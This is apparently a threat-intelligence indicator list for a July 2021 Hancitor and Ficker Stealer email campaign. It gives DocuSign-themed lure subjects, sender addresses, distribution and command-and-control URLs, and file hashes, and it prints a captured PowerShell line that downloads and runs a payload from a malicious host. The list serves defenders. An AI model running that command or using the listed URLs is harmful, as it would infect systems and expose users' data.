2021-07-08 Hancitor IOCs

1. THREAT IDENTIFICATION: HANCITOR / FICKER STEALER
2.  
3. HANCITOR BUILD NUMBER
4. BUILD=0707in2_wvcr
5.  
6. SUBJECTS OBSERVED
7. You got invoice from DocuSign Electronic Service
8. You got invoice from DocuSign Electronic Signature Service
9. You got invoice from DocuSign Service
10. You got invoice from DocuSign Signature Service
11. You got notification from DocuSign Electronic Service
12. You got notification from DocuSign Electronic Signature Service
13. You got notification from DocuSign Service
14. You got notification from DocuSign Signature Service
15. You received invoice from DocuSign Electronic Service
16. You received invoice from DocuSign Electronic Signature Service
17. You received invoice from DocuSign Service
18. You received invoice from DocuSign Signature Service
19. You received notification from DocuSign Electronic Service
20. You received notification from DocuSign Electronic Signature Service
21. You received notification from DocuSign Service
22. You received notification from DocuSign Signature Service
23.  
24. SENDERS OBSERVED
25. [email protected]
26. [email protected]
27. [email protected]
28. [email protected]
29. [email protected]
30. [email protected]
31. [email protected]
32. [email protected]
33. [email protected]
34. [email protected]
35. [email protected]
36. [email protected]
37. [email protected]
38. [email protected]
39. [email protected]
40. [email protected]
41. [email protected]
42. [email protected]
43. [email protected]
44. [email protected]
45. [email protected]
46. [email protected]
47. [email protected]
48. [email protected]
49. [email protected]
50. [email protected]
51. [email protected]
52. [email protected]
53. [email protected]
54. [email protected]
55. [email protected]
56. [email protected]
57. [email protected]
58. [email protected]
59. [email protected]
60. [email protected]
61. [email protected]
62. [email protected]
63.  
64. MALDOC PROXY DISTRIBUTION URLS
65. http://feedproxy.google.com/~r/aadrkvpwohr/~3/hvqIAWB8ZGo/legend.php
66. http://feedproxy.google.com/~r/aaigmlntaz/~3/zDMjq9cpjP0/purported.php
67. http://feedproxy.google.com/~r/agrfofpkhoi/~3/Nvuc4ZHoAuU/trafficked.php
68. http://feedproxy.google.com/~r/aoqdbq/~3/lgYeMYdoVFs/edelweiss.php
69. http://feedproxy.google.com/~r/bcoycuchq/~3/85TxsQt3Q1A/expatiate.php
70. http://feedproxy.google.com/~r/bfaiobxnn/~3/40BvVc5LU1I/nondestructive.php
71. http://feedproxy.google.com/~r/ccfhf/~3/YPVRRIvUyF0/detrition.php
72. http://feedproxy.google.com/~r/conikypz/~3/zYdenqefeFM/polemic.php
73. http://feedproxy.google.com/~r/eapqs/~3/PXLELUQiOIM/enabled.php
74. http://feedproxy.google.com/~r/eaxffuyn/~3/MPqSB8haPFM/pointedness.php
75. http://feedproxy.google.com/~r/efuzvpwwuw/~3/Ju_TpdCJw7o/trover.php
76. http://feedproxy.google.com/~r/ggwrkvfiz/~3/5AZsEWUuj0w/wrath.php
77. http://feedproxy.google.com/~r/gidppccnezk/~3/8yvHqCvJiiA/limp.php
78. http://feedproxy.google.com/~r/higcitfx/~3/rrnrD2uQluU/funny.php
79. http://feedproxy.google.com/~r/huwwygzkokv/~3/3N-X0bO5epU/isle.php
80. http://feedproxy.google.com/~r/igxzzrinx/~3/Z97ozNdjlSA/siderite.php
81. http://feedproxy.google.com/~r/kkyknzxqa/~3/OSA0nIazKI4/presumed.php
82. http://feedproxy.google.com/~r/lfmzx/~3/DIfbI5M9auQ/schoolmarm.php
83. http://feedproxy.google.com/~r/mezzzkrooh/~3/gM2AilSs-2U/witnesser.php
84. http://feedproxy.google.com/~r/oehvfutz/~3/J8P7yN6ucko/toothless.php
85. http://feedproxy.google.com/~r/ogitcfzsl/~3/5Psg9vP0R7k/sleekness.php
86. http://feedproxy.google.com/~r/oivbslq/~3/8sJ-OEQ-QKk/sinned.php
87. http://feedproxy.google.com/~r/puyhr/~3/c91Mx9dCypw/tuba.php
88. http://feedproxy.google.com/~r/qvdii/~3/lgxzfGdyDyo/greeting.php
89. http://feedproxy.google.com/~r/reibxjjfqv/~3/YHK3BGNsq0Q/tangibly.php
90. http://feedproxy.google.com/~r/rtiuexidp/~3/L0TOvxtMT4E/aboard.php
91. http://feedproxy.google.com/~r/sjsovniji/~3/j9cG3K3J4SU/interpretation.php
92. http://feedproxy.google.com/~r/slcqfyy/~3/IPa4MfWbIUs/practitioner.php
93. http://feedproxy.google.com/~r/sxdcbtwtun/~3/CKI5VDNqNpM/versification.php
94. http://feedproxy.google.com/~r/vmfctlny/~3/0kW56lAJalM/firmament.php
95. http://feedproxy.google.com/~r/vtvqpysqgjx/~3/sG4SsBpOZNM/monument.php
96. http://feedproxy.google.com/~r/wwenrdi/~3/ZVOWXtVkwCo/antimatter.php
97. http://feedproxy.google.com/~r/ymtonk/~3/e2Kt7bOAP10/cutlass.php
98.  
99. MALDOC REDIRECT DOWNLOAD URLS
100. http://an.nastena.lv/greeting.php
101. http://catface.us/expatiate.php
102. http://gbsports.theapplab.org/tuba.php
103. http://gbsports.theapplab.org/wrath.php
104. http://grecozenobi.com.ar/presumed.php
105. http://grecozenobi.com.ar/sinned.php
106. http://grecozenobi.com.ar/trover.php
107. http://greechip.net/polemic.php
108. http://gunsify.com/sleekness.php
109. http://homevault.co.uk/aboard.php
110. http://homevault.co.uk/enabled.php
111. http://jaxthemessenger.com/witnesser.php
112. http://maoptions.xyz/detrition.php
113. http://maoptions.xyz/monument.php
114. http://maoptions.xyz/trafficked.php
115. http://new.novapilates.com/versification.php
116. http://nextclickcorp.net/nondestructive.php
117. http://nextclickcorp.net/practitioner.php
118. http://pphc.welkinfortprojects.com/edelweiss.php
119. http://pphc.welkinfortprojects.com/limp.php
120. http://seatranscorp.com/cutlass.php
121. http://seatranscorp.com/purported.php
122. http://seatranscorp.com/toothless.php
123. http://sportsrunouts.com/antimatter.php
124. http://sportsrunouts.com/isle.php
125. http://sportsrunouts.com/tangibly.php
126. http://turquoisecoaching.co.uk/funny.php
127. http://turquoisecoaching.co.uk/pointedness.php
128. http://virfilms.in/interpretation.php
129. http://virfilms.in/siderite.php
130. http://vivo.com.pk/firmament.php
131. https://www.adstudiophotography.com/legend.php
132. https://www.adstudiophotography.com/schoolmarm.php
133.  
134. adstudiophotography.com
135. catface.us
136. grecozenobi.com.ar
137. greechip.net
138. gunsify.com
139. homevault.co.uk
140. jaxthemessenger.com
141. maoptions.xyz
142. nastena.lv
143. nextclickcorp.net
144. novapilates.com
145. seatranscorp.com
146. sportsrunouts.com
147. theapplab.org
148. turquoisecoaching.co.uk
149. virfilms.in
150. vivo.com.pk
151. welkinfortprojects.com
152.  
153. MALDOC XLL FILE HASHES
154. 0708_891792481.xll
155. 41e0318dfdb1c180a375a7efc712649e
156.  
157. MALDOC DOC FILE HASHES
158. 46b5387cedf436ebd2c0800f2e8297e2
159. 4bdfb6932eba2bb3cbce59a2bae3cee2
160. aec795705d76fe4e3a66adbace539656
161. b4144d8e8e735f9a24f8c6e043438077
162. d32db402317d36e8a207d5b5a71d6cac
163. e071a5ed02d41002303b7e5763bfb307
164.  
165. HANCITOR PAYLOAD DOWNLOAD URLS
166. (this proceeded from running the .xll file)
167. http://srand04rf.ru/92375234.xml
168. http://srand04rf.ru/08.jpg
169.  
170. HANCITOR PAYLOAD FILE HASH
171. (as usual, this was dropped after enabling macros in the .doc file)
172. niberius.dll
173. 378d5008e351365908e039475b7180b0
174.  
175. POWERSHELL SCRIPT FROM OPENING THE XLL FILE
176. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
177. poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
178. sTart 'c:\Users\Public\snd32sys.exe'
179.  
180. (this proceeded from running the .xll file)
181. 92375234.xml
182. 71999a9d2f15e164c9b1fa926aa6444b
183.  
184. res32.hta (same hash)
185. 71999a9d2f15e164c9b1fa926aa6444b
186. ----------------------------------------
187. 08.jpg
188. ed1921467f6784af6bdca40a06a541b5
189.  
190. snd32sys.exe (same hash)
191. ed1921467f6784af6bdca40a06a541b5
192.  
193. HANCITOR C2
194. http://anspossthrly.ru/8/forum.php
195. http://sudepallon.com/8/forum.php
196. http://thentabecon.ru/8/forum.php
197.  
198. FICKER STEALER DOWNLOAD URL
199. http://srand04rf.ru/7hfjsdfjks.exe
200.  
201. FICKER STEALER FILE HASH
202. 7hfjsdfjks.exe
203. 270c3859591599642bd15167765246e3
204.  
205. FICKER C2
206. http://pospvisis.com